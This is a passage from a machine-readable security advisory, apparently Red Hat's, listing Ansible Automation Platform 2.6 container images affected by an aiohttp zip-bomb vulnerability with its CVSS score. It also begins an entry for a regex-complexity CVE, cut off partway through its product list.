"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
